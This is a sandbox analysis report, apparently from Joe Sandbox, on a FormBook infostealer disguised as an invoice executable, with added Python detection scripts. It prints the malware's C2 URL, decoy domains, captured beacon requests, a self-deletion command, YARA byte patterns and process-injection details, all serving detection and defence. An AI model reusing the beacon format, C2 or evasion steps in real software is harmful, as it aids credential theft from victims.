Windows Analysis Report EXPORT INVOICE 2021.exe

Overview

General Information

Sample Name: EXPORT INVOICE 2021.exe
Analysis ID: 502233
MD5: 54bb8fbbfe0a665ca59579a0240ce2f0
SHA1: 0b97e4463c76df4541179880902bb6966ef3f894
SHA256: 3bd841c6957e9fdb7e9d4558fb417dca9d7317d087cdbbb270155d9a6698e657
Tags: exe, xloader
Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Self deletion via cmd delete
Injects a PE file into a foreign process
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Sigma detected: CMSTP Execution Process Creation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Uses Windows Living Off The Land Binaries (LOLBins)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file name differs from the original file name recorded in its version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • EXPORT INVOICE 2021.exe (PID: 7128 cmdline: 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe' MD5: 54BB8FBBFE0A665CA59579A0240CE2F0)
    • EXPORT INVOICE 2021.exe (PID: 5548 cmdline: {path} MD5: 54BB8FBBFE0A665CA59579A0240CE2F0)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmstp.exe (PID: 1688 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
          • cmd.exe (PID: 5860 cmdline: /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.vulcanopresale.icu/mqi9/"], "decoy": ["spectehnika-rb.com", "daleproaudio.xyz", "cpw887.com", "gosbs-b01.com", "clarkmanagementhawaii.com", "taobaoi68.xyz", "hoppedchardonnay.com", "extremesavings.net", "newbiepanda.com", "arul-jegadish.com", "kellibrat.com", "avto-mercury.info", "percussionportal.com", "colorfulworldpublishing.com", "notvaccinatedjobs.com", "cattavida.com", "pioniersa.com", "yanduy.com", "mzjing.com", "piedmontpines.school", "sosibibyslot.space", "yfly635.xyz", "undauntedearth.com", "ratqueen.art", "docomoat.xyz", "themysticalmushroom.com", "woodbinecommunityplan.com", "al-m3hd.com", "globalglodpower.com", "circuitboardsolution.com", "zoipartner.com", "varibat45.com", "sean-inspires.com", "533hd.com", "yuezhong66.com", "latewood.xyz", "mrsparberrysplace.com", "shyy-life.com", "znypay.com", "eludice.net", "kalitelihavaperdesi.com", "classicmusclecargarage.com", "divulgesloatr.xyz", "djkozmos.com", "eazyjspowerwash.com", "xn--naturecan-823hqc4t8089b.xyz", "merchediazcobo.com", "09mpt.xyz", "zapoartist.quest", "vagusartesaniaymoda.online", "blogbynasir.com", "cliffwoof.com", "aj03yansinbiz.biz", "gaboshoes.com", "italiangomvqs.xyz", "safari-fadel.com", "diorbijoux.com", "lookforwardswiss.com", "qsygqc.com", "wehaveunconditionallove.com", "kingsmeadfarm.com", "928711.com", "saint444.com", "fashiona.space"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author (matched strings listed beneath each row)

00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security

00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bec:$sqlite3step: 68 34 1C 7B E1
  • 0x16b08:$sqlite3text: 68 38 2A 90 C5
  • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
  • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C

00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security

00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

(19 further memory-dump matches are not shown here.)

Unpacked PEs

Source | Rule | Description | Author (matched strings listed beneath each row)

2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security

2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bec:$sqlite3step: 68 34 1C 7B E1
  • 0x16b08:$sqlite3text: 68 38 2A 90 C5
  • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
  • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C

2.2.EXPORT INVOICE 2021.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security

2.2.EXPORT INVOICE 2021.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

(1 further unpacked-PE match is not shown here.)

          Sigma Overview

          System Summary:

Sigma detected: CMSTP Execution Process Creation
Source: Process started, Author: Nik Seetharaman, Data: Command: /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe', CommandLine: /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe', CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\cmstp.exe, ParentImage: C:\Windows\SysWOW64\cmstp.exe, ParentProcessId: 1688, ProcessCommandLine: /c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe', ProcessId: 5860
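The Sigma hit fires on the relationship, not on the deletion: cmstp.exe (a signed Microsoft LOLBin that FormBook hollowed out) is the parent of the cmd.exe that wipes the dropped sample, and a Connection Manager profile installer has no business spawning a shell. Two further things in the process tree are cheap to alert on and are not covered by that rule: cmstp.exe was started by explorer.exe with an empty argument list (a real invocation carries an .inf path), and the cmd.exe child runs `/c del` on the original sample. The Python below is an added example for this page, not Nik Seetharaman's rule or Joe Sandbox code: it evaluates a reading of the cited Sigma rule (parent image ends in `\cmstp.exe`; check the rule in the SigmaHQ repository for its exact selection and filters) plus those two heuristics over constructed process-creation events. The first three events reproduce the report's tree using the Sigma field names shown above; the fourth is a constructed benign control (an installer running cmstp with a profile) that is not from the report, and the no-arguments check is a heuristic.

```python
import re

# Constructed process-creation events in the field names the report's Sigma hit uses.
# The first three reproduce the report's tree (explorer 3424 -> cmstp 1688 -> cmd 5860 -> conhost 6040);
# the last is a constructed benign control (installer running cmstp with an .inf), not from the report.
EVENTS = [
    {"ProcessId": 1688, "Image": r"C:\Windows\SysWOW64\cmstp.exe",
     "CommandLine": r"C:\Windows\SysWOW64\cmstp.exe",
     "ParentProcessId": 3424, "ParentImage": r"C:\Windows\Explorer.EXE"},
    {"ProcessId": 5860, "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r"/c del 'C:\Users\user\Desktop\EXPORT INVOICE 2021.exe'",
     "ParentProcessId": 1688, "ParentImage": r"C:\Windows\SysWOW64\cmstp.exe"},
    {"ProcessId": 6040, "Image": r"C:\Windows\system32\conhost.exe",
     "CommandLine": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
     "ParentProcessId": 5860, "ParentImage": r"C:\Windows\SysWOW64\cmd.exe"},
    {"ProcessId": 4242, "Image": r"C:\Windows\System32\cmstp.exe",
     "CommandLine": r'cmstp.exe /s "C:\Program Files\CorpVPN\corpvpn.inf"',
     "ParentProcessId": 4100, "ParentImage": r"C:\Windows\System32\msiexec.exe"},
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "explorer.exe"}
SELF_DELETE_RE = re.compile(r"/c\s+del\b", re.I)


def image_name(path):
    """Basename of a Windows image path, lower-cased (Sigma's 'Image|endswith' compares this way)."""
    return path.rsplit("\\", 1)[-1].lower()


def has_no_arguments(event):
    """Heuristic: the command line is nothing but the image path. Real cmstp runs pass an .inf profile."""
    return event["CommandLine"].strip().strip('"').lower() == event["Image"].lower()


def sigma_cmstp_child_process(e):
    """Reading of the cited Sigma rule: any process whose parent is cmstp.exe."""
    return image_name(e["ParentImage"]) == "cmstp.exe"


def cmstp_no_args_from_explorer(e):
    """cmstp.exe started by explorer.exe without arguments, as in the report's tree (injected explorer)."""
    return (image_name(e["Image"]) == "cmstp.exe"
            and image_name(e["ParentImage"]) == "explorer.exe"
            and has_no_arguments(e))


def cmd_self_delete_via_lolbin(e):
    """cmd.exe running '/c del' for a parent that is not an interactive shell: the self-deletion step."""
    return (image_name(e["Image"]) == "cmd.exe"
            and SELF_DELETE_RE.search(e["CommandLine"]) is not None
            and image_name(e["ParentImage"]) not in SHELLS)


RULES = (sigma_cmstp_child_process, cmstp_no_args_from_explorer, cmd_self_delete_via_lolbin)


def detect(events, rules=RULES):
    """Return sorted (rule name, ProcessId) pairs for every event that matches a rule."""
    return sorted((rule.__name__, e["ProcessId"]) for e in events for rule in rules if rule(e))


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:32s} PID {pid}")
```

Feed it Sysmon Event ID 1 or Security 4688 records mapped onto the same field names and the three alerts land on PIDs 1688 and 5860 while conhost and the installer stay quiet. Because the tree also shows the sample's own second instance and explorer.exe doing the network traffic, tie these alerts to the parent chain (explorer.exe -> cmstp.exe) in your SIEM rather than to cmstp.exe alone.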

          Jbx Signature Overview


          AV Detection:

Found malware configuration
Source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, Malware Configuration Extractor: FormBook {"C2 list": ["www.vulcanopresale.icu/mqi9/"], "decoy": ["spectehnika-rb.com", "daleproaudio.xyz", "cpw887.com", "gosbs-b01.com", "clarkmanagementhawaii.com", "taobaoi68.xyz", "hoppedchardonnay.com", "extremesavings.net", "newbiepanda.com", "arul-jegadish.com", "kellibrat.com", "avto-mercury.info", "percussionportal.com", "colorfulworldpublishing.com", "notvaccinatedjobs.com", "cattavida.com", "pioniersa.com", "yanduy.com", "mzjing.com", "piedmontpines.school", "sosibibyslot.space", "yfly635.xyz", "undauntedearth.com", "ratqueen.art", "docomoat.xyz", "themysticalmushroom.com", "woodbinecommunityplan.com", "al-m3hd.com", "globalglodpower.com", "circuitboardsolution.com", "zoipartner.com", "varibat45.com", "sean-inspires.com", "533hd.com", "yuezhong66.com", "latewood.xyz", "mrsparberrysplace.com", "shyy-life.com", "znypay.com", "eludice.net", "kalitelihavaperdesi.com", "classicmusclecargarage.com", "divulgesloatr.xyz", "djkozmos.com", "eazyjspowerwash.com", "xn--naturecan-823hqc4t8089b.xyz", "merchediazcobo.com", "09mpt.xyz", "zapoartist.quest", "vagusartesaniaymoda.online", "blogbynasir.com", "cliffwoof.com", "aj03yansinbiz.biz", "gaboshoes.com", "italiangomvqs.xyz", "safari-fadel.com", "diorbijoux.com", "lookforwardswiss.com", "qsygqc.com", "wehaveunconditionallove.com", "kingsmeadfarm.com", "928711.com", "saint444.com", "fashiona.space"]}
Multi AV Scanner detection for submitted file
Source: EXPORT INVOICE 2021.exe, VirusTotal: Detection: 32%
Source: EXPORT INVOICE 2021.exe, Metadefender: Detection: 17%
Yara detected FormBook
Source: Yara match, File source: 2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, type: MEMORY
Machine Learning detection for sample
Source: EXPORT INVOICE 2021.exe, Joe Sandbox ML: detected
Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: EXPORT INVOICE 2021.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: EXPORT INVOICE 2021.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: cmstp.pdbGCTL, source: EXPORT INVOICE 2021.exe, 00000002.00000002.798051676.0000000001299000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP, source: EXPORT INVOICE 2021.exe, 00000002.00000002.798456430.0000000001530000.00000040.00000001.sdmp, cmstp.exe, 00000008.00000002.937373897.0000000004850000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb, source: EXPORT INVOICE 2021.exe, 00000002.00000002.798456430.0000000001530000.00000040.00000001.sdmp, cmstp.exe
Source: Binary string: cmstp.pdb, source: EXPORT INVOICE 2021.exe, 00000002.00000002.798051676.0000000001299000.00000004.00000020.sdmp

          Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe, Domain query: www.kalitelihavaperdesi.com
Source: C:\Windows\explorer.exe, Network Connect: 51.161.86.13:80
Source: C:\Windows\explorer.exe, Network Connect: 209.17.116.165:80
Source: C:\Windows\explorer.exe, Domain query: www.ratqueen.art
Source: C:\Windows\explorer.exe, Domain query: www.piedmontpines.school
Source: C:\Windows\explorer.exe, Domain query: www.yuezhong66.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.vulcanopresale.icu/mqi9/
Source: Joe Sandbox View, ASN Name: OVHFR OVHFR
Source: Joe Sandbox View, ASN Name: DEFENSE-NETUS DEFENSE-NETUS
Source: global traffic, HTTP traffic detected:
  GET /mqi9/?4heD=-Zg8bjv8BJx4HBw&z0=iv8Ag4bEJuIinTRZ0o23voggRtPwqtQ/ydF60y+S+AJP0Z2gEdIzW1gU1h5YO8GPbSLa HTTP/1.1
  Host: www.ratqueen.art
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii: (seven null bytes, nothing printable)
Source: global traffic, HTTP traffic detected:
  GET /mqi9/?z0=TImHsH9dZg2P5abYftozWuM8TNrG03iNFbmWCvRDMTsTbH54OyQX2B6DGU+4mOJFrbhV&4heD=-Zg8bjv8BJx4HBw HTTP/1.1
  Host: www.piedmontpines.school
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii: (seven null bytes, nothing printable)
Source: EXPORT INVOICE 2021.exe, 00000000.00000003.677421719.000000000155D000.00000004.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
Source: unknown, DNS traffic detected: queries for: www.ratqueen.art
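The networking evidence shows the FormBook pattern that trips up naive blocking: the configuration names one C2 (`www.vulcanopresale.icu/mqi9/`) and 64 decoys, and the injected explorer.exe sends the same `GET /mqi9/?<param>=...&<param>=...` beacon, with no User-Agent header, to decoy hosts such as www.ratqueen.art and www.piedmontpines.school. The decoys are ordinary third-party domains chosen to bury the real C2 in noise, so a blocklist built only from the "C2 list" misses most of the traffic, and a blocklist built from the decoys would punish bystanders. What is stable across the sample's hosts is the URI path from the C2 entry and the missing User-Agent. The Python below is an added example for this page, not Joe Sandbox's extractor or any FormBook tooling: it builds IOC sets from a subset of the extracted configuration, reassembles the two captured requests from the report's one-line rendering, and classifies each request by host role, URI path and User-Agent. The request to the C2 host and the browser-style control request are constructed and were not observed in the analysis.

```python
import json
import re
from urllib.parse import urlsplit

# Subset of the FormBook configuration extracted in the report (the C2 entry and four of the 64 decoys).
CONFIG = json.loads("""{"C2 list": ["www.vulcanopresale.icu/mqi9/"],
 "decoy": ["ratqueen.art", "piedmontpines.school", "yuezhong66.com", "kalitelihavaperdesi.com"]}""")

# The two GETs the sandbox captured, reassembled with CRLFs, plus two constructed requests:
# one to the configured C2 host and one ordinary browser request as a control.
REQUESTS = {
    "report_ratqueen": ("GET /mqi9/?4heD=-Zg8bjv8BJx4HBw&z0=iv8Ag4bEJuIinTRZ0o23voggRtPwqtQ/ydF60y+S+AJP0Z2gEdIzW1gU1h5YO8GPbSLa HTTP/1.1\r\n"
                        "Host: www.ratqueen.art\r\nConnection: close\r\n\r\n"),
    "report_piedmont": ("GET /mqi9/?z0=TImHsH9dZg2P5abYftozWuM8TNrG03iNFbmWCvRDMTsTbH54OyQX2B6DGU+4mOJFrbhV&4heD=-Zg8bjv8BJx4HBw HTTP/1.1\r\n"
                        "Host: www.piedmontpines.school\r\nConnection: close\r\n\r\n"),
    "constructed_c2": ("GET /mqi9/?4heD=-Zg8bjv8BJx4HBw&z0=AAAA HTTP/1.1\r\n"
                       "Host: www.vulcanopresale.icu\r\nConnection: close\r\n\r\n"),
    "constructed_benign": ("GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
                           "User-Agent: Mozilla/5.0\r\nConnection: close\r\n\r\n"),
}

REQUEST_LINE_RE = re.compile(r"^(GET|POST) (\S+) HTTP/1\.[01]\r?\n(.*)$", re.S)
HEADER_RE = re.compile(r"^([A-Za-z-]+):[ \t]*(.*?)\r?$", re.M)


def canon(host):
    """Lower-case a host and drop the 'www.' FormBook prepends when it contacts a configured domain."""
    host = host.strip().lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


def build_iocs(cfg):
    """Return ({c2_host: uri_path}, {decoy_host, ...}) from an extracted FormBook configuration."""
    c2 = {}
    for entry in cfg["C2 list"]:
        host, _, path = entry.partition("/")
        c2[canon(host)] = "/" + path
    return c2, {canon(d) for d in cfg["decoy"]}


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, target, {header: value})."""
    m = REQUEST_LINE_RE.match(raw)
    if not m:
        raise ValueError("not an HTTP/1.x request")
    method, target, rest = m.groups()
    head = rest.split("\r\n\r\n", 1)[0]
    headers = {k.title(): v for k, v in HEADER_RE.findall(head)}
    return method, target, headers


def classify_host(host, c2, decoys):
    """'c2', 'decoy' or 'unknown' for a queried or contacted host name."""
    h = canon(host)
    return "c2" if h in c2 else "decoy" if h in decoys else "unknown"


def classify_request(raw, c2, decoys):
    """Return (canonical host, [findings]); findings are empty for traffic that looks unrelated."""
    method, target, headers = parse_request(raw)
    host = headers.get("Host", "")
    path = urlsplit(target).path
    findings = []
    role = classify_host(host, c2, decoys)
    if role != "unknown":
        findings.append(f"{role}_host")
    if any(path.startswith(p) for p in c2.values()):
        findings.append("c2_uri_path")           # the beacon path is shared by C2 and decoys
    if "User-Agent" not in headers:
        findings.append("no_user_agent")         # the report flags the same absence
    return canon(host), findings


if __name__ == "__main__":
    c2_hosts, decoy_hosts = build_iocs(CONFIG)
    for label, raw in REQUESTS.items():
        print(label, classify_request(raw, c2_hosts, decoy_hosts))
    for name in ("www.kalitelihavaperdesi.com", "www.yuezhong66.com", "www.founder.com.cn"):
        print(name, classify_host(name, c2_hosts, decoy_hosts))
```

Used as a proxy-log or Zeek http.log post-processor, the `c2_uri_path` plus `no_user_agent` pair is the alert to page on; `decoy_host` on its own is context, not an indicator of compromised infrastructure, and the decoy domains should not go on a blocklist. The DNS queries the report attributes to explorer.exe (kalitelihavaperdesi, ratqueen, piedmontpines, yuezhong66) all resolve to `decoy` here, which matches the observation that no request to the real C2 was captured during the run.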

          E-Banking Fraud:

Yara detected FormBook
Source: Yara match, File source: 2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

Malicious sample detected (through community Yara rule)
Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.EXPORT INVOICE 2021.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.797159788.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.936050522.00000000004D0000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.783716545.000000000DABF000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.936919278.0000000002C30000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.797806020.00000000011D0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.797859484.0000000001200000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.763077934.000000000DABF000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.937017238.0000000002D30000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Initial sample is a PE file and has a suspicious name
Source: initial sample, Static PE information: Filename: EXPORT INVOICE 2021.exe
Source: EXPORT INVOICE 2021.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
